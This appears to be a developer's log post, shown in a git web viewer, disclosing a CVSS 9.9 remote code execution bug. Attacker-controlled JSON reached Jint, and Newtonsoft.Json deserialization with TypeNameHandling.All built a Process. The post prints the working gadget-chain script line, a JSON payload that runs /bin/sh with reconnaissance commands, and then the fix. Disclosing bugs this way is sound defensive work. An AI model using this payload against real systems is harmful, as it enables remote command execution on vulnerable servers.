summaryrefslogtreecommitdiffstats
path: root/_log/jint-gadget-chain-rce.md
blob: 081ec0e6299887c1079a28afc90de2770213530d (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
---
title: CVSS 9.9 Jint gadget chain RCE
date: 2026-07-18
layout: post
---

Asyx6, a bounty hunter, reported a CVSS 9.9 RCE vulnerability in a six-year-old
program.

The application exposed JSON data from HTTP requests to Jint as
JObjects—presumed safe because the CLR interop was disabled in the Jint
configuration.  It wasn't.

Jint uses reflection-based method resolution on CLR types regardless of the
interop settings. A user-defined script invoking ToObject() on a JObject
activates Newtonsoft.Json's deserializer. Together, these formed a gadget chain
from attacker-controlled JSON payload to System.Diagnostics.Process:

```
data.ToObject(cfg).Start(psi.ToObject(cfg)).StandardOutput.ReadToEnd();
```

The script triggers the deserialization of the following malicious JSON payload
via a serializer configured with TypeNameHandling.All. This constructs a
Process, starts it, and reads its output:

```
{
    "data": {"$type": "System.Diagnostics.Process, System.Diagnostics.Process"},
    "psi": {
        "$type": "System.Diagnostics.ProcessStartInfo, System.Diagnostics.Process",
        "FileName": "/bin/sh",
        "ArgumentList": ["-c", "id; hostname; uname -sm; head -2 /etc/os-release"],
        "RedirectStandardOutput": true,
        "UseShellExecute": false
    },
    "cfg": {"TypeNameHandling": 3}
}
``` 

Fix: Objects that implement IDictionary<string, object> bypass Jint's method
resolution system. Converted all objects that cross the CLR-JavaScript boundary
to ExpandoObjects. Blocked reflection types from reaching Jint for good
measure.